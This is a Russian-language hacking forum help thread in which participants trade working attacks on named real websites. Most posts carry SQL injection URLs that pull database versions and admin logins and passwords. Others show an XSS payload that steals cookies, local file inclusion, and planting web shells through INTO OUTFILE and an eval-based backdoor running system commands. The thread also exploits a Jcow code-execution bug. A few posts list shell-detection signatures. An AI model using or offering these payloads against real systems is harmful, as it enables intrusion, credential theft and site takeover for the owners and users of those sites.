Samael91 said:
Здравствуйте.
Подскажите как раскручивать такую SQL inj
http://www.vesti-moscow.ru/rnews.html?id=100114+order+by+13--
Но когда ввожу
http://www.vesti-moscow.ru/rnews.html?id=100114+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13--
Ошибка! 0_о


Там стоит Oracle

http://tvrus-sales.com/fullvideo.html?video_id=1705+union+select+null,nul l+from+sys.dual

KUKLOVOD2 said:
значит все пытаюсь раскрутить эту скулю.Наблюдается интересное явление:при запросе

Code:
Email=1')+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFO RMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='View_DRM_Keys'+AN D+COLUMN_NAME+NOT+IN+('asscode ','assigndate','AssignedDate','assignedtype','assi gnusername','binary_message_body','cdkey','CDSeria lNum'))--+&submit=Send+Registration+Key

мы видим что существует колонка code в таблице View_DRM_Keys.Но когда делаем выборку:

Code:
Email=1')+or+1=(SELECT+TOP+1+code+from+View_DRM_Ke ys)--+&submit=Send+Registration+Key

видим следующее:Invalid column name 'code'.Почему так?
Потом поэксперементировав я обнаружил, что вытаскивая колонки из разных таблиц, вытакскиваются колонки с одними и теме же именами, хотя в данных таблицах они могут и не существовать.Что можно предпринять?


up, вопрос еще актуален.Уязвимый сайт: http://socketmobile.com/support/wifi/pw.asp

FlaktW said:
Там стоит Oracle
http://tvrus-sales.com/fullvideo.html?video_id=1705+union+select+null,nul l+from+sys.dual


Скажи плиз как ты узнал что там Oracle?

Samael91 said:
Скажи плиз как ты узнал что там Oracle?


http://tvrus-sales.com/fullvideo.html?video_id=1705+union+select+null+fro m+sys.dual

http://tvrus-sales.com/fullvideo.html?video_id=1705+union+select+null,nul l+from+sys.dual

Отличия видишь?

Komyak said:

Code:
+and+1=0+union+select+1,CONCAT(CONCAT(count(*),use rname,CONCAT(count(*),password))),3,4,5,6,7,8+from +calendar_users limit+0,1--

Вывод делает: и все, больше ничего не получается извлечь.



Здесь люди не экстрасенсы...попробуй

1+and+1=0+UNION+SELECT+1,2,3,unhex(hex(username)), 5,6,7,8+FROM+calendar_users+LIMIT+0,1+--

Здравствуйте, как вывести названия таблиц, если через information_schema.tables не выводит, но известна БД (к примеру catalog) ?

http://*/index.php?id=-5+union+select+1,2,,4,5,6,version(),8,9,10,11,12,1 3,14,15,16,17,18,19+--+

Версия-4.0.27-Max-log

http://realestatesky.net/index.php?option=com_propiedades&controller=../../../../../../../../../../../proc/self/environ%00

Почему не инклудит логи? И как можно прочитать конфиг?

Skipp said:
Здравствуйте, как вывести названия таблиц, если через information_schema.tables не выводит, но известна БД (к примеру catalog) ?
http://*/index.php?id=-5+union+select+1,2,,4,5,6,version(),8,9,10,11,12,1 3,14,15,16,17,18,19+--+
Версия-4.0.27-Max-log


Никак. В mysql4 нет information_schema, а БД можно узнать встроенной функциейD)

XAMEHA said:
Никак. В mysql4 нет information_schema, а БД можно узнать встроенной функцией
D)


Получается нельзя добраться до логин:пароль никак??? (через инъекцию)

Skipp said:
Получается нельзя добраться до логин:пароль никак??? (через инъекцию)



методом тыка...то есть колонки и таблицу подбираешь сам

plaeer said:
http://realestatesky.net/index.php?option=com_propiedades&controller=../../../../../../../../../../../proc/self/environ%00
Почему не инклудит логи? И как можно прочитать конфиг?


permission denied же

подбирать полностью названия, или посимвольно можно как-нибудь?

По словарю.

Посоветуйте пожалуйста тогда программу или скрипт( только если perl)

Skipp said:
Посоветуйте пожалуйста тогда программу или скрипт( только если perl)


havij, а скрипт на перле вообще за пару минут можно написать(если уметь).

подскажите как оперой (ну или хромом) отправить http серверу левые заглолвки??

variselus said:
подскажите как оперой (ну или хромом) отправить http серверу левые заглолвки??


смотря какие заголовки.

Хороших плагинов я не знаю для них, а вот для firefox есть как минимум два. livehttpheaders и tamperdata.

Ну и внешние средства, конечно же, свои скрипты или HTTPAnalyzer

variselus said:
подскажите как оперой (ну или хромом) отправить http серверу левые заглолвки??


Попробуй прокси fiddler2

http://javascript.ru/tools/http-debug/fiddler

Я как нуб, задаю такой вопрос. Немного подучил SQL-injection и щас хочу научиться xss , так вот взял форум который попался) Узнал что это IPB 2.1.* потом здесь (https://antichat.live/threads/89112/) смотрю на сплойты, вот пример:


[ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="/cgi-bin/s.jpg?"+document.cookie);`


И такой вопрос что с им делать и какие функцыи он может делать, коротче, розяснить что к чему

Выполнение JavaScript кода на атакуемой странице.

Melfis said:
получаешь 2. Всё норм выводит. Первая таблица пустая.


не хочет он показывать почемуто!

как ещё можно вывести инфу?кроме information.schema 5 версия

Faaax said:
не хочет он показывать почемуто!


Спать надо было меньше. Теперь не хочет.


Faaax said:
как ещё можно вывести инфу?кроме information.schema 5 версия


Вообще не понятно о чём вопрос.

Code:
http://tinyurl.com/3nx5tzf

это же выводится!

а вот другую таблицу не выводит

Faaax said:

Code:
http://tinyurl.com/3nx5tzf

это же выводится!
а вот другую таблицу не выводит


Тебе же сказали, что она пустая.

попугай said:
смотря какие заголовки.
Хороших плагинов я не знаю для них, а вот для firefox есть как минимум два. livehttpheaders и tamperdata.
Ну и внешние средства, конечно же, свои скрипты или HTTPAnalyzer


спасибо за tumper data... отличная вещь! много всего полезного там нашел))

есть таблица, там дохрена столбцов. Запрос на вывод этих 3 нужных мне столбцов как я понял вот:


Code:
SELECT concat_ws(0x3a, email, PASSWORD , salt) FROM table

а может кто помочь с запросом, чтобы вывести эти 3 столбца в отдельную табличку, или в файлик. Заранее спасибо

Ulitko said:
а может кто помочь с запросом, чтобы вывести эти 3 столбца в отдельную табличку, или в файлик. Заранее спасибо




Code:
SELECT concat_ws(0x3a, email, PASSWORD , salt) FROM table INTO OUTFILE 'абсолютный_путь_до_папки_с_ правами_на_запись/имя_файла'

Cherep said:
абсолютный путь, это как?))))


относительно корня системы

/var/www/site/index.php

Cherep said:
абсолютный путь, это как?))))


Это путь до папки на которой стоят права на запись.

Пример: /home/dmitr/domains/site/public_html/upload/

Есть скуля:


http://russellwolff.com/ee/index.php/site/trackbacks/47'/


как ее крутить не пойму

FlaktW,

blind...

Как крутить при таком случае:


Code:
http://www.textsongs.ru/search/?name=%27

p.s. просьба не цитировать мое сообщение...

Как крутить при таком случае:


Code:
http://www.textsongs.ru/search/?name=%27

Вот так!


http://www.textsongs.ru/search/?name=1%27and%281%3D0%29union%28select%281%29%2Cco ncat_ws%280x3a%2Cversion%28%29%2Cdatabase%28%29%2C user%28%29%2C%40%40version_compile_os%29%2C3%2C4%2 C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2 C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2 C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2 C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2 C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2 C56%2C57%2C58%29%23


5.0.77-log: peoplesru:alex192@192.168.0.162:redhat-linux-gnu

Вопрос: Чтобы угнать ак админа нужно спирить у его куки, чтобы забрать куки нужно снифер, чтобы снифер заберал куки нужно xss уязвимость, чтобы найти уязвимость нужно посетить сайт античат. Я все правельно понял? или здесь чтото нетак? И как поподробней использувать xss со снифером если можно ссилки на мануалы

2~{OmRus}~

/thread20140.html

http://finclub.perm.ru/?show=561064292&news_id=-815805698+union+select+1,2,user(),4,version(),6,7, 8 не могу подобрать таблицы. 4 ветка.

http://kostomuksha-city.ru/test/ebanucca.php


это mod_rewrite? как получить путь до .php файла, выдающего phpinfo()?

vaddd said:
это mod_rewrite? как получить путь до .php файла, выдающего phpinfo()?


SCRIPT_FILENAME /pub/home/***/new/htdocs/test.php

на сайте имеется XSS

проходят подставки типа hack и пр.

а

alert('hack') не канает, как дальше двигать подскажите

foozzi said:
на сайте имеется XSS
проходят подставки типа hack и пр.
а
alert('hack') не канает, как дальше двигать подскажите


Смотри что как фильтруется, поиграй символами, я пару раз видел фильтры, которые вырезают , спасало что-то типа ipt>

/thread20140.html советую к ознакомлению

podskajite plz vozmojno li sdelat CREATE TABLE cherez: =-1+union+select+1,2,3,(create table test ( tst INT)),5,6+--+

ili kak voobshe delat create table cherez injekciu, zaranee spasibo

gh0stface said:
podskajite plz vozmojno li sdelat CREATE TABLE cherez: =-1+union+select+1,2,3,(create table test ( tst INT)),5,6+--+
ili kak voobshe delat create table cherez injekciu, zaranee spasibo


Через инъекцию в MySQL - нельзя! Можно только в MSSQL инъекции.

pomogite plz eshe s takoi situaciei:

esli url yazvima i ya znau polnii put dla zaliva shell i znay chto v into outfile mojno ispolzovat kavichki, mojno li oboitis bes poiska colonok dla union a srazu popitatsa zalit shell v pervoi kolonke uniona, a ostalnie zakomentirovat:

site.com?id=-1+union+select+0x6F6C6F6C6F+INTO+OUTFILE+'/path/tst.txt'+--+

gh0stface said:
pomogite plz eshe s takoi situaciei:
esli url yazvima i ya znau polnii put dla zaliva shell i znay chto v into outfile mojno ispolzovat kavichki, mojno li oboitis bes poiska colonok dla union a srazu popitatsa zalit shell v pervoi kolonke uniona, a ostalnie zakomentirovat:
site.com?id=-1+union+select+0x6F6C6F6C6F+INTO+OUTFILE+'/path/tst.txt'+--+


количество полей, используемых в запросе требуется найти для составления самого запроса, собственно. чтобы для сервера он был верным. в случае с INTO OUTFILE не нужно искать только принтабельные поля, т.к. мы вводим данные, а не выводим и можем сделать это через любое поле.

Qwert321 said:
Подскажите плз. При вставке квадратных скобок, начинает выдавать( я так понял тип запроса) Array - www.magazin.seti.ee/modules/Board/recherche.php?action=1&terme[] , а когда вписываешь %00 в скобки, то вообще запрос выдает нулевое. запрос делается по типу ...&terme="query" ...как раскрутить багу?


Логин и пасс админа.


Code:
http://www.magazin.seti.ee/modules/Board/index.php?pa=view&cid=78+limit+0+union+select+1,2,uname,pass,5,6,7,8 ,9,10,11+from+m_seti_users+limit+0,1%23

Я пожалуй процитирую первый пост:


В этой и только в этой теме вы можете задать вопрос
про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках
(для остального есть поиск по форуму)
.
Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать.
Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях крайне не рекомендуется


Здесь не центр первой помощи, и если кто-то хочет найти статью, мануал, фак, видео, заметку ЮЗАЙТЕ ПОИСК!

Здесь не школьный кабинет, в котором вам будут разжевывать детально как что-то использовать, ВАМ МОГУТ ПОМОЧЬ, но за вас НИКТО НИЧЕГО ДЕЛАТЬ НЕ БУДЕТ И НЕ ДОЛЖЕН.

Обращусь к людям кто отвечает на вопросы, я лично Вам очень благодарен, прекрасно понимаю, что значит грамотно и правильно объяснить задающему вопрос, ответ так, что бы он понял, но пожалуйста, повторюсь, пожалуйста, не решайте их проблемы за них, натолкните их на мысль, на правильное направление, но не давайте НИКОМУ готовых решений, потому, что люди этим пользуются, и не понимают, что они делают, и потом каждый раз приходят в эту тему и умоляют что бы за них кто-то подумал и сделал.

Обращусь к людям кто задает вопрос, будьте так любезны. перед тем как задать вопрос, используйте поиск по форуму, пробегитесь глазами по заголовкам прикрепленных тем, в большинстве случаев ответ на ваш вопрос уже дан, даже поговорка есть "семь раз отмерь, один отрежь", и действительно лучше самому семь раз подумать, и решить проблему, тем самым повысив свой боевой скил, чем каждый раз спрашивать одно и тоже.

Помогите понять, в чем причина ошибки?

Так инъекция срабатывает

http://site.ru/index.php?a=50+and+1=if(ascii(substring((user()),1 ,1))>=100,1,0)/*

но если подставить select перед user()

http://site.ru/index.php?a=50+and+1=if(ascii(substring((SELECT user()),1,1))>=100,1,0)/*

то выдает ошибку


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in


Может из-за версии mysql 3.23.44 ?

LamerHacker said:
Помогите понять, в чем причина ошибки?
Так инъекция срабатывает
http://site.ru/index.php?a=50+and+1=if(ascii(substring((user()),1 ,1))>=100,1,0)/*
но если подставить
select
перед
user()
http://site.ru/index.php?a=50+and+1=if(ascii(substring((
SELECT
user()),1,1))>=100,1,0)/*
то выдает ошибку
Может из-за версии mysql 3.23.44 ?


Потому что (SELECT user()) будет является подзапросом, которые появились с версии 4.1. Так что да, ты прав, дело в версии.

Спасибо

Из-за версии не получается так же подставить UNION SELECT

Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?

LamerHacker said:
Спасибо
Из-за версии не получается так же подставить
UNION SELECT
Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?


посимвольный брут

есть скуля


Code:
http://www.vgtrk.com/rnews.html?sid=86&id=4716

стоит oracle

подскажите как вывести таблицы и колонки?

LamerHacker said:
Спасибо
Из-за версии не получается так же подставить
UNION SELECT
Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?


https://rdot.org/forum/showthread.php?t=503

Такой вопрос, вот собственно скуля

http://extrovert.irkutsk.ru/?id=-4+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13, 14,15,16--

я немного непойму как работает ето скрипт

типа http://extrovert.irkutsk.ru/?id=4 берётся название файла из БД под id = 4 и потом инклудится?? или я нетак понял?? и ещо вопрос, как я могу етим воспользоватся?

qaz said:
Такой вопрос, вот собственно скуля
http://extrovert.irkutsk.ru/?id=-4+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13, 14,15,16--
я немного непойму как работает ето скрипт
типа http://extrovert.irkutsk.ru/?id=4 берётся название файла из БД под id = 4 и потом инклудится?? или я нетак понял?? и ещо вопрос, как я могу етим воспользоватся?


ну если ты видишь, что значение из 4 колонки попадает в функцию main, значит это должно делать для тебя какие-то выводы

Как создать админа WP 3.0 через sql injection?

Kuteke said:
Как создать админа WP 3.0 через sql injection?


/thread224374.html - смотри вдео, там всё показано.

Kuteke said:
Как создать админа WP 3.0 через sql injection?


95% что скуль в селекте. стало быть никак.

Есть сайт, нашел на нем Blind Injection

Powered-by: PHP/5.2.17

DB Server: MySQL

Через Havij получаю доступ к бд, админку не нашел, так же как и логин с паролем, как можно залить в данном случае шелл ?

Axeline said:
Есть сайт, нашел на нем Blind Injection
Powered-by: PHP/5.2.17
DB Server: MySQL
Через Havij получаю доступ к бд, админку не нашел, так же как и логин с паролем, как можно залить в данном случае шелл ?


выбор не велик, всё тот же INTO OUTFILE. можно юзать в тандеме с LINES TERMINATED BY.

как вариант можно юзать LOAD_FILE() для поиска других багов.

можно ещё натравить какой-нить dirbuster, вкусняшек поискать. в том числе и админку)

Axeline said:
Есть сайт, нашел на нем Blind Injection
Powered-by: PHP/5.2.17
DB Server: MySQL
Через Havij получаю доступ к бд, админку не нашел, так же как и логин с паролем, как можно залить в данном случае шелл ?


Ещё можно поискать phpmyadmin.

Через Havij получаю доступ к бд, админку не нашел, так же как и логин с паролем, как можно залить в данном случае шелл ?


Доступ в бд это понятие растяжимое... если например получил пдоступ к талице с юзерами мускула) то посмотри привелегии и читаи пост выше) тоха плохого не посоветует)

ну а если привилегий нет) то либо пости в топике о помощи в поиске админки) либо забей на скуль и иди дальше)

Dare said:
Мне почему то кажеться что это даже не похоже не sql )
даже не php
ЗЫ:Думаем прежде чем выносить мозг порядочным людям )


Это скуль

1) http://www.pro-tec.com.ua/news/30'

2) http://www.pro-tec.com.ua/lang/0'

Помогите пожалуйста

foozzi said:
какой браузер в *nix системах е фильтрирует урлы? например как IE. потому что при использовании xss форма не вылазит, только ошибку показывает.
либо как обойти эту фильрацию что бы xss осуществить нормально?


https://rdot.org/forum/showthread.php?t=1403

Как правильно составить конструкцию для Blind SQL на этом сайте?

http://www.braz.by/?action=catalog_detail_model_view&data%5Bid_make%5D=555&data%5Bid_model%5D=1326 OR id=IF(ASCII(SUBSTRING((SELECT USER()),0,1)>=100,'1','0')--+

FlaktW said:
Как правильно составить конструкцию для Blind SQL на этом сайте?
http://www.acsavto.ru/mitsubishi/?page_id=379 OR id=IF(ASCII(SUBSTRING((SELECT USER()),0,1)>=100,'1','0')--+


там не блайнд.

http://www.acsavto.ru/mitsubishi/?page_id=379+union+select+1,2,3,4,5,6,7,version(), 9,10,11,12

FlaktW said:
Знаю, я сайт перепутал, смотри исправления


да и тут тоже.

http://www.braz.by/?action=catalog_detail_model_view&data[id_make]=555&data[id_model]=-1326+union+select+version(),2,3,4,5,6,7,8,9,10,11, 12--

d1v said:
да и тут тоже.
http://www.braz.by/?action=catalog_detail_model_view&data[id_make]=555&data[id_model]=-1326+union+select+version(),2,3,4,5,6,7,8,9,10,11, 12--


Скажи, как ты подобрал количество полей?

FlaktW said:
Скажи, как ты подобрал количество полей?


order+by+11--

order+by+12--

order+by+13--


http://www.camholland.nl[antigoogle]/info.aspx?p=kinkyporno&referer=kinky_leftbar&user_id=7903
Тут скулья?


нет

Подскажите как вывести таблицы из определенной БД в SQL inj

например есть БД:

db1,db2,db3,db4 и т.д. Мне нужно вывести таблицы только из db3

Когда то видел этот запрос но сейчас не могу найти

Kudos said:
Подскажите как вывести таблицы из определенной БД в SQL inj
например есть БД:
db1,db2,db3,db4 и т.д. Мне нужно вывести таблицы только из db3
Когда то видел этот запрос но сейчас не могу найти




Code:
SELECT TABLE_NAME FROM `TABLES` WHERE TABLE_SCHEMA = 'db3'

есть ли бага в файлах

heks, нужно фильтровать данные, которые пользователь может передать скрипту.

подскажите как раскрутить эту скулю?


Code:
http://www.euromet.ru:80/search/?search=1'

Faaax said:
подскажите как раскрутить эту скулю?

Code:
http://www.euromet.ru:80/search/?search=1'



Там несколько запросов


Code:
http://www.euromet.ru/search/?search=ololo' and updatexml(0x03b,concat(0x3b,(select version())),0x03b)-- x

Народ Как можно найти чужой шелл на севере ?

Интересны варианты обнаружения посторонних шелов

если консоль активна, то можно например так:


Code:
find / -type f -size +20k -name "*.php"

выведет все пути до фалов с маской *.php размер которых более 20 кб. т.е. всо(~22 и ~67 кб) и всякие другие.

Ochki said:
Народ Как можно найти чужой шелл на севере ?
Интересны варианты обнаружения посторонних шелов


был у меня один скрипт,если найду,то выложу здесь!

даже шелл нашёл который даёт такую функцию!

скачать (http://zalil.ru/31692229)

P.S. шелл проверь сначала!

o'clock,

а серв не за ддосишь этим?)

Ochki,

PhPAntiVirus скачай, он не грузить серв вообще, сколько бы там не было файлов! Открой там virus.def и измени содержимое на


Code:
SHELL (base64_decode
SHELL eval
SHELL assert
SHELL auth_pass

Нашел Post уязвимость на сайте

http://mirbek-star.3dn.ru/load/audio/mirbek_atabekov_tan_syry_skachat_v_formate_mp3/1-1-0-51

Data:id=1&a=1&ajax=370

Что бы по быстрому добраться до базы использовал Havij и WebCruiser ни 1 не смог потому что символы там не понятные..пытается что то сблиндить и не как,есть варианты как пасс админа вытащить если символы не англ?

Заранее спасибо.

Kuteke said:


Помогите раскрутить!


Code:
/?id=5934

P.S. С меня наградка в ПМ...




там нет инъекции

попугай said:
там нет инъекции


там пасивная XSS

alerondel,

если сломаешь напиши в ПМ)))) А вообще как обнаружил, что есть уязвимость?

Nightmarе,

БД есть, но доступ не дают, насколько я помню, либо дают, но платно(дорого)!

Помогите залить шелл

Скрипт Jcow 4.2.1. В скрипте присутствует уязвимость - не фильтруется параметр "attachment"

сам код:


PHP:
$app=$_POST['attachment'];

if (strlen($app) &&$app!='status') {

include_once('modules/'.$app.'/'.$app.'.php');

$c_run=$app.'::ajax_post();';

eval($c_run);

exit;

}

есть эксплот под metasploit http://www.exploit-db.com/exploits/17722/ Сплойт коннектится к хосту, а вот, как залить шелл, ума не приложу, может кто че посоветует? Спасибо

VertuOzz said:
Скрипт Jcow 4.2.1. В скрипте присутствует уязвимость - не фильтруется параметр "attachment"
сам код:

PHP:
$app=$_POST['attachment'];

if (strlen($app) &&$app!='status') {

include_once('modules/'.$app.'/'.$app.'.php');

$c_run=$app.'::ajax_post();';

eval($c_run);

exit;

}

есть эксплот под metasploit
http://www.exploit-db.com/exploits/17722/
Сплойт коннектится к хосту, а вот, как залить шелл, ума не приложу, может кто че посоветует? Спасибо


постом в переменной attachment передай phpinfo();//

Есть инъекция в INSERT INTO

insert into TABLE (id, subid, date, data) values ('666', 'SQL', '', '')

Можно что-нибудь извлечь из этого?

Запрос комментариями не обрезается. MQ off

попугай said:
Есть инъекция в INSERT INTO
insert into TABLE (id, subid, date, data) values ('666', '
SQL
', '', '')
Можно что-нибудь извлечь из этого?
Запрос комментариями не обрезается. MQ off


Вот может тебе эта статейка поможет?!

_http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html

P.S: кинь ссылку в пм глянуть

winstrool said:
Вот может тебе эта статейка поможет?!
_http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html
P.S: кинь ссылку в пм глянуть


Читал уже. Проблема в том, что нельзя обрезать запрос комментарием как в статье показано.

А где-то подсмотреть результаты инсерта можно?

то почему бы просто не сделать вот так?

insert into TABLE (id, subid, date, data) values ('666', ''+(select bla_bla_bla), '', '')

ну и селект не из это же таблицы, помним)

Expl0ited said:
постом в переменной attachment передай phpinfo();//


Передавал, phpinfo отображается, а дальше чего?

VertuOzz said:
Передавал, phpinfo отображается, а дальше чего?


код выполняй!

попробуй этот


Code:
eval(stripslashes($_GET[e]));

Faaax said:
код выполняй!
попробуй этот

Code:
eval(stripslashes($_GET[e]));



Извиняюсь за нубский вопрос, а что это даст?

VertuOzz said:
Извиняюсь за нубский вопрос, а что это даст?


это может дать тебе возможность выполнять пхп код, т.е если в том месте где ты вставил эту строчку срабодает пхп инфо которое можешь вызвать так "e=phpinfo();" то значит можешь удаленно попробовать залить шелл примерно так "e=cp("/folder/shell.php","http://localhost/shell.txt");" ну или на месте самой этой строчки вставить код уплодера, вообщем вариантов куча)

winstrool said:
это может дать тебе возможность выполнять пхп код, т.е если в том месте где ты вставил эту строчку срабодает пхп инфо которое можешь вызвать так "e=phpinfo();" то значит можешь удаленно попробовать залить шелл примерно так "e=cp("/folder/shell.php","http://localhost/shell.txt");" ну или на месте самой этой строчки вставить код уплодера, вообщем вариантов куча)


А можно через cmd залить?

На команду


Code:
find . -type d -perm 777 -print

ругнулся


HTML:
Warning: include_once() [function.include]: Failed opening 'modules/error_reporting(0);print `find . -type d -perm 777 -print`;///error_reporting(0);print `find . -type d -perm 777 -print`;//.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/public_html/includes/libs/ss.inc.php on line 168


но выдал все папки с правами на записью Какой командой можно залить файл, удаленно или локально?

winstrool said:
"e=cp("/folder/shell.php","http://localhost/shell.txt");"


Херню не неси

sourcec0de said:
Херню не неси


Есле херня, аргументируй!!! в чем имено,

cp - это функция копирования, линукса, онаже COPY на пхп, а как вы ее будите использовать это уже другой вопрос, требую аргументировать в чем херня!

winstrool said:
Есле херня, аргументируй!!! в чем имено,
cp - это функция копирования, линукса, онаже COPY на пхп, а как вы ее будите использовать это уже другой вопрос, требую аргументировать в чем херня!


https://rdot.org/forum/images/smilies/light_skin/stopit.gif

Сначала пишешь вставить эвал, а потом юзаешь системные команды(непосресдтвенно через эвал), да еще и с неправильными аргументами...

VertuOzz said:
А можно через cmd залить?
На команду

Code:
find . -type d -perm 777 -print

ругнулся

HTML:
Warning: include_once() [function.include]: Failed opening 'modules/error_reporting(0);print `find . -type d -perm 777 -print`;///error_reporting(0);print `find . -type d -perm 777 -print`;//.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/public_html/includes/libs/ss.inc.php on line 168


но выдал все папки с правами на записью Какой командой можно залить файл, удаленно или локально?


если есть возможность, посмотри какие качалки есть, может WGET есть, ей и попробуй если через пхп то copy("куда", "откуда");, если локально то "cp "

winstrool said:
если есть возможность, посмотри какие качалки есть, может WGET есть, ей и попробуй если через пхп то copy("куда", "откуда");, если локально то "cp "


system \ passthru \ etc => system("cp ");

Но никак не просто в eval въебать cp.

Может все-таки не будешь пугать людей?

winstrool said:
ей и попробуй если через пхп то copy("куда", "откуда");,


И опять бред, ты я смотрю главный распространитель дезинформации тут.

winstrool said:
если есть возможность, посмотри какие качалки есть, может WGET есть, ей и попробуй если через пхп то copy("куда", "откуда");, если локально то "cp "


Это LFI, и произвольное выполнение кода(Не команд).

P.S. Писать не хотел, так как это элементарно, но winstrool попросил разобраться.

XAMEHA said:
Это LFI, а не произвольное выполнение кода/команд.
P.S. Писать не хотел, так как это элементарно, но
winstrool
попросил разобраться.


Это и произвольное выполнение кода и LFI. Но мне кажется, что "произвольное выполнение кода" как-то выгоднее нежели LFI, да и говорим мы не о LFI сейчас.

/showpost.php?p=2829300&postcount=18023


PHP:
$app=$_POST['attachment'];

...

include_once('modules/'.$app.'/'.$app.'.php');

...

$c_run=$app.'::ajax_post();';

...

eval($c_run);//EVAL!!1111 Code Execution



Писать не хотел, так как это элементарно, но Расмус Лердорф попросил разобраться.

Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo();

Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок?

Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =)

Спасибо ...

MyGreenLife said:
Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo();
Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок?
Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =)
Спасибо ...


php?commanda=system($_GET[console]);&console=ls -la

MyGreenLife said:
Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo();
Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок?
Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =)
Спасибо ...


Боюсь спрашивать, но рискну:

Как ты залил бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых.

Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');

Tigger said:
Боюсь спрашивать, но рискну:
Как ты
залил
бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых.
Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');


полностью с тобой согласен!

некоторые много говорят не поделу!

Tigger said:
Боюсь спрашивать, но рискну:
Как ты
залил
бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых.
Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');


Я просто хотел узнать как можно найти доступные папки для записи, ибо бекдор можно залить и если нету прав на запись в диру. Например через модуль булки. За совет спасибо.


php?commanda=system($_GET[console]);&console=ls -la


Спасибо.

Помогите со скулью:

http://nora-m.ru/index/2/product/220+order+by+1--

_http://wow.net.kg/^object=201388 нашел Cookie иньекцию,ввожу данные в Havij пишет что Target is vulnerable,уязвима,но..

Bypassing illegal union failed! Turning off this feature

Как решить ?

нашел LFI, админку с авторизацией по .htaccess, добавлялку новостей...

инклужу ее...


http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml


Вылазит форма добавления с actionом

поидее, должен быть файл /adm/main.phtml - но при инклуде его выдает ошибку.

меняю action на

http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml

при добавление новости пишет "невозможно выполнить запрос".

Что еще можно попробовать сделать?

vaddd said:
нашел LFI, админку с авторизацией по .htaccess, добавлялку новостей...
инклужу ее...
Вылазит форма добавления с actionом

поидее, должен быть файл /adm/main.phtml - но при инклуде его выдает ошибку.
меняю action на
http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml
при добавление новости пишет "невозможно выполнить запрос".
Что еще можно попробовать сделать?


скорей всего admnews.phtml инклюдит что-то еще, а так как ты инклюдишь этот скрипт с другой диры, то некоторые скрипты не подгружаются.

Osstudio said:
Помогите со скулью:
http://nora-m.ru/index/2/product/220+order+by+1--


При http://nora-m.ru/index/2/product/220 тоже вылазит ошибка, так что, скорее всего в скрипте отсутствует уязвимость.

Пардон, ошибся.Пробуй blind инъекцию

Пролез в бд но выдает все на непонятной кодировке..что можно сделать?

xa-xa89 said:
А где-то подсмотреть результаты инсерта можно?
то почему бы просто не сделать вот так?
insert into TABLE (id, subid, date, data) values ('666', ''+(select bla_bla_bla), '', '')
ну и селект не из это же таблицы, помним)


способ великолепен, спасибо, но к сожалению колонка subid INT, поэтому записать левак туда не удастся.

P.S.

попробовал

1' or(1,2)=(select count(*),concat((select concat(table_name,0x3a,column_name) from information_schema.columns where table_schema !=0x696e666f726d6174696f6e5f736368656d61 limit 0,1),0x3a,floor(rand()*2)) from information_schema.columns group by 2 limit 0,1)+'

уже лучше.

MYSQL ERROR:

Operand should contain 1 column(s)

Можно же вывести через duplicate column ?

P.P.S

все решилось

